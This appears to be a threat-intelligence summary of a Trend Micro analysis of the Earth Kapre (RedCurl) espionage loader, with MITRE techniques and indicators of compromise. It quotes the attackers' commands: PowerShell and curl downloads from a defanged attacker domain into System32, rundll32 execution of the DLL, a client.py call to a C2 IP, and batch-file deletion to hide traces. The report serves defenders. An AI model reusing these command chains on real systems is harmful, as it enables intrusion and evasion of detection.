Unveiling Earth Kapre aka RedCurl’s Cyberespionage Tactics With Trend Micro MDR, Threat Intelligence

Trend Micro’s analysis details how the Earth Kapre (aka RedCurls) loader is deployed using legitimate tools (curl, 7-Zip) and script-based obfuscation to fetch, extract, and execute a DLL payload. The intrusion uses SMB-based command-and-control and Impacket smbexec activity with an observed C2 IP of 198.252.101.86. #EarthKapre #RedCurls #Impacket

Keypoints

Threat actors used PowerShell and curl to download curl.exe to C:WindowsSystem32 as a staging tool for further downloads.
A copy of 7-Zip (7za.exe) was downloaded to C:WindowsSystem32 and used to extract an archive (ms.tmp) with the password “123”.
The Earth Kapre loader was deployed as ms.dll (occasionally ps.dll) to C:WindowsSystem32 and executed via rundll32.exe.
Commands were written into temporary batch files via echo, executed, and then deleted to hinder analysis and cover tracks.
A Python client (client.py) established SMB-based outbound communication (port 445) to an observed C2 IP 198.252.101.86, and Impacket smbexec activity was detected to enable remote command execution.

MITRE Techniques

[T1059.001] PowerShell – Used to download files: (‘powershell -c “iwr -Uri http://preston[.]melaniebest[.]com/ms/curl.tmp -OutFile C:WindowsSystem32curl.exe -UseBasicParsing”‘).
[T1059] Command and Scripting Interpreter – Batch and cmd.exe used to echo commands into temporary .bat files and execute them: (‘cmd.exe /Q /c echo curl -o C:WindowsSystem327za.exe http://preston[.]melaniebest[.]com/ms/7za.tmp … & C:Windowssystem32cmd.exe /Q /c del C:WindowsTEMPIAqJUm.bat’).
[T1105] Ingress Tool Transfer – Remote files transferred via HTTP and saved to disk (e.g., curl.exe, 7za.exe, ms.dll): (‘curl -o C:WindowsSystem32ms.dll http://preston[.]melaniebest.com/ms/ms.tmp’).
[T1218] Signed Binary Proxy Execution – rundll32.exe used to execute the downloaded DLL loader: (‘rundll32.exe C:Windowssystem32ms.dll,ms’).
[T1071.004] Application Layer Protocol: SMB – SMB used for outbound communications and remote command execution over port 445: (‘…client.py –server-ip 198[.]252[.]101[.]86 –server-port 41808’).
[T1021.002] SMB/Windows Admin Shares – Impacket smbexec behavior observed, enabling a semi-interactive shell via SMB for remote command execution.
[T1036] Masquerading – Use of legitimate utilities (curl.exe, 7za.exe) to perform malicious actions while appearing benign: (‘Curl.exe is a command-line tool…’ and ‘7za.exe is a copy of 7-Zip’).
[T1070.004] File Deletion – Temporary batch files created for execution were deleted afterwards to remove traces: (‘del %TEMP%KzIMnc.bat’).

Indicators of Compromise

[Domain] Download C2 domain – preston.melaniebest[.]com (used for curl.tmp, 7za.tmp, ms.tmp).
[IP Address] Observed C2 – 198[.]252[.]101[.]86 (passed to client.py as –server-ip).
[File names/paths] Staged and payload files – C:WindowsSystem32curl.exe, C:WindowsSystem327za.exe, C:WindowsSystem32ms.dll (also ms.tmp, ps.dll, client.py).
[Commands] Artifact/commands seen – PowerShell iwr download commands and rundll32 execution strings (examples shown in echoed batch commands).

The intrusion sequence begins with script-driven downloads: attackers used PowerShell and echoed cmd commands to fetch a curl binary (curl.tmp saved as C:WindowsSystem32curl.exe) and a 7-Zip binary (7za.tmp saved as C:WindowsSystem327za.exe). Each command was written into temporary .bat files via echo, executed, and then deleted to reduce forensic visibility. Using curl, the actor retrieved an archive ms.tmp from the same domain and stored it in the system temp location.

After staging, the archive ms.tmp was extracted using the locally dropped 7za.exe with the hardcoded password “123,” producing the loader DLL (ms.dll, sometimes named ps.dll) which was placed in C:WindowsSystem32. The loader was executed through rundll32.exe (rundll32.exe C:WindowsSystem32ms.dll,ms), enabling in-memory execution of the Earth Kapre payload. This chain leverages legitimate executables and scripting to blend with normal activity.

The deployed Python component (client.py run via pythonw.exe) established SMB-based outbound communication to an external server (observed IP 198.252.101.86 on port 41808), and network activity showed use of Impacket tools consistent with smbexec to obtain a semi-interactive shell over SMB. Overall, the operation combines HTTP-based ingress, archive extraction, DLL execution via signed-binary proxy, and SMB-based C2/lateral techniques while using temporary batch files and deletion to evade detection.